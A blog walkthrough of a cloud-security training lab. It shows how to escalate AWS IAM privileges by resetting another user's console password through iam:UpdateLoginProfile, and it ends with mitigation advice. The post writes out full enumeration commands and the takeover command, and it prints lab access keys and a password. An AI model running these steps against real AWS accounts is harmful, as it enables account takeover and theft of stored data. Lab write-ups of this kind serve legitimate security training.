Open in app

Sign in

Write

Sign in

AWS Pentesting: IAM Privilege Escalation via iam:UpdateLoginProfile

@ro0taddict
6 min readDec 26, 2024

--

In this writeup, we will do another walkthrough on Cybr’s IAM UpdateLoginProfile PrivEsc lab, which highlights privilege escalation by abusing the iam:UpdateLoginProfile permission which changes the password for the specified IAM user.

The image below shows that our IAM user is “iam-updateloginprofile-privesc-1735204289491-Attacker”.

Lets run as usual the aws-enumerator tool using the command below. We can get this tool from this link. Another tool that you may try is Andres Riancho’s enumerate-iam which we can get from this link or the bf-aws-permission by Carlos Polop.

./aws-enumerator cred  -aws_access_key_id  AKIAVDN5CV7VEBDQP74D -aws_secret_access_key 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
./aws-enumerator enum -services all -speed slow
./aws-enumerator dump -services sts,iam

Based on the output, we can GetUser, ListUsers, ListGroups, ListPolicies, and ListAccessKeys.

Lets get a high level overview of the AWS services used by the target organization. I normally use Cloudfox with “inventory” option or Prowler with “quick-check” option for this use case.

./cloudfox aws --profile <profile name> inventory
./cloudfox aws --profile UpdateLoginProfile inventory

The lab mentioned that our main goal is to escalate our permission so we can read the contents of the restricted S3 buckets.

The CloudFox output above shows that the S3 is utilized by the target organization.

Let’s run the S3 command below to check our permission to list the bucket and to get the contents of the bucket.

aws s3 ls --profile <profile name>
aws s3 ls --profile UpdateLoginProfile

The output above shows our IAM user has no permission to list the contents of the bucket.

Recon for Users, Groups and Roles.

Next, lets recon for the policies of the user, roles and groups that our user is a member. The output of aws-enumerator shows we dont have permission to list roles, so we can focus on the policies for the user and the group.

To review the permissions on the group, first I typically would identify the group to which our user belongs. Next, I would examine any inline and attached policies applied to that group, check for version of those policies, and then retrieve the details of those policies.

In this lab, we would focus on the policies applied on the user and on the group.

Lets run “list-user-policies” and “list-attached-user-polices” to check for inline and attached policies applied to the user.

aws iam list-user-policies --user-name <username> --profile <profile name>
aws iam list-user-policies --user-name iam-updateloginprofile-privesc-1735204289491-Attacker --profile  UpdateLoginProfile 

aws iam list-attached-user-policies --user-name <username> --profile <profile name>
aws iam list-attached-user-policies --user-name iam-updateloginprofile-privesc-1735204289491-Attacker --profile  UpdateLoginProfile

The image above shows that there are no inline and attached policies applied to this user.

Next, let’s run the list-groups-for-user command to identify the groups our current IAM user is a member of.

aws iam list-groups-for-user --user-name <user-name> --profile <profile name>
aws iam list-groups-for-user --user-name iam-updateloginprofile-privesc-1735204289491-Attacker --profile  UpdateLoginProfile

The image below shows that there is a group named “iam-updateloginprofile-privesc-1735204289491-Developers”

We can probably check for the other groups using the command “list-groups” but as the lab title suggest, we can just focus first on the on the policies for the current group and the list of users.

aws iam list-group-policies --group-name <group name> --profile <profile name>
aws iam list-group-policies --group-name iam-updateloginprofile-privesc-1735204289491-Developers --profile  UpdateLoginProfile

The image below shows that there is a group policy named iam-updateloginprofile-privesc-1735204289491-policy

Lets get this policy document using the command below.

aws iam get-group-policy --group-name <group name> --policy-name <policy name> --profile <profile name>
aws iam get-group-policy --group-name iam-updateloginprofile-privesc-1735204289491-Developers --policy-name iam-updateloginprofile-privesc-1735204289491-policy --profile UpdateLoginProfile

The image below indicates that three users — Attacker, Mark, and Bob — possess multiple permissions, including iam:UpdateLoginProfile and iam:CreateLoginProfile. However, a subsequent policy explicitly denies certain actions for Attacker, Mark, and Alice. It’s important to note that in AWS Identity and Access Management (IAM), if a user has both an explicit allow and an explicit deny for the same action, the explicit deny takes precedence and overrides the allow.

Lets check also all the 4 users ( as also shown in the Cloudfox output) in the environment.

aws iam list-users --profile <profile name>
aws iam list-users --profile UpdateLoginProfile

Based on the recon result, we can update the profile of this “iam-updateloginprofile-privesc-1735204289491-Bob” user

As an option, you may cross check this privilege escalation vector using Pacu. Check my other walkthrough such as this link, on how to set up Pacu.

run iam__enum_permissions
run iam__enum_users_roles_policies_groups
run iam__privesc_scan

As shown above, Pacu was not able to detect this UploadLoginProfile privilege escalation attack vector.

Let’s now configure the profile of Bob using the command below.

aws iam update-login-profile --user-name <target-username> --password <password> --no-password-reset-required --profile  <profile name>
aws iam update-login-profile --user-name iam-updateloginprofile-privesc-1735204289491-Bob --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile  UpdateLoginProfile

The command above returned no error, indicating that the command was accepted.

As the last few steps, access the console by clicking the link below. Change the region to us-east-1.

https://console.aws.amazon.com/console/home?nc2=h_ct&

We can then download the contents of the S3 buckets.

Conclusion:

In this walkthrough, we showed how privilege escalation can be performed by abusing the iam:UpdateLoginProfile permission. To mitigate the risk of privilege escalation via the iam:UpdateLoginProfile permission, restrict this permission to trusted administrators only, ensuring that regular users cannot modify login profiles unless there is a strong business use case. Additionally, implement multi-factor authentication (MFA) and adhere to the principle of least privilege to enhance overall security.

In this lab, we also showed our recon methodology on IAM permissions and covered tools such as IAM Enumerator, Cloudfox, and Pacu.

References:

https://cybr.com/hands-on-labs/lab/iam-updateloginprofile-privesc/
https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/
https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateLoginProfile.html

--

--

@ro0taddict
@ro0taddict

Written by @ro0taddict

58 Followers
58 Following

InfoSec enthusiast; Lifelong learner

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams